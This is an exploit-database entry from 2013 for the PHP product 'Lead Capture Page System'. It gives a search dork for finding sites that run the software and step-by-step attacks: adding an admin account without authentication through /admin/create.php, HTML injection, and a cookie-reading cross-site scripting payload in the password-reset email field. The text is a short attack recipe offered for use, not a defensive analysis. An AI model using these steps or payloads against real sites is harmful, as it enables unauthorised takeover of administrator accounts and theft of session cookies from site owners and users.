Lead Capture Page System Multiple Vulnerabilties

2013-06-14T00:00:00
ID 1337DAY-ID-20891
Type zdt
Reporter AtT4CKxT3rR0r1ST
Modified 2013-06-14T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Lead Capture Page System Multiple Vulnerabilties
==============================================================
 
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST 
.:. Contact        : [[email protected]] , [[email protected]]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://leadcapturepagesystem.com/
.:. Dork           : Powered By Lead Capture Page System
####################################################################

===[ Exploit ]===

Remote Add Admin:
=================

Go To [www.site.com/admin/create.php] and Fill in the information

Html Injection:
===============

1-Go To [ww.site.com/admin/getpassword.html]

2-Put on the [Email] any html code like:

<h1>INJECTION</h1>


Cross-Site Scripting:
=====================

1-Go To [ww.site.com/admin/getpassword.html]

2-Put on the [Email] any code like:

"><script>alert(document.cookie)</script>

####################################################################

#  0day.today [2018-04-12]  #